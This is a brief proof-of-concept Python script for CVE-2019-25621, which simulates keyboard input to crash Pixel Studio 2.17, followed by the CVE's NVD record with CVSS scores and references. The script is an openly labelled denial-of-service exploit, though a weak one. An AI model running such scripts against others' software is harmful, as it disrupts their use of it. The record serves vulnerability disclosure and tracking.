CVE-2019-25621

# PoC for CVE-2019-25621 - Pixel Studio Denial of Service # This script simulates sending malformed input via keyboard. # Requires the 'keyboard' library (pip install keyboard) import keyboard import time def trigger_dos(): print("Starting PoC for CVE-2019-25621...") print("Please ensure Pixel Studio 2.17 is the active window.") time.sleep(5) try: # Simulate sending a stream of arbitrary/malformed characters # This mimics the 'arbitrary characters' mentioned in the description # that cause the application to become unresponsive. while True: keyboard.write("%&$#@!malformed_input_data") keyboard.press_and_release('enter') # Breaking after a few iterations to prevent freezing the test machine entirely # In a real crash scenario, the target app stops before this. break except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": trigger_dos()

{"cve": {"id": "CVE-2019-25621", "sourceIdentifier": "[email protected]", "published": "2026-03-23T14:16:26.283", "lastModified": "2026-03-24T14:22:37.573", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pixel Studio 2.17 contains a denial of service vulnerability that allows local attackers to crash the application by providing malformed input through the keyboard interface. Attackers can trigger the vulnerability by entering arbitrary characters, causing the application to become unresponsive or terminate abnormally."}, {"lang": "es", "value": "Pixel Studio 2.17 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales colapsar la aplicación al proporcionar una entrada malformada a través de la interfaz del teclado. Los atacantes pueden activar la vulnerabilidad al introducir caracteres arbitrarios, lo que provoca que la aplicación deje de responder o se cierre de forma anómala."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-807"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pixarra:pixel_studio:2.17:*:*:*:*:*:*:*", "matchCriteriaId": "FC195E2E-6E1A-41D3-A4CE-B1FB33768194"}]}]}], "references": [{"url": "http://www.pixarra.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://www.pixarra.com/uploads/9/4/6/3/94635436/tbpixelstudio_install.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46127", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/pixel-studio-denial-of-service-via-malformed-input", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}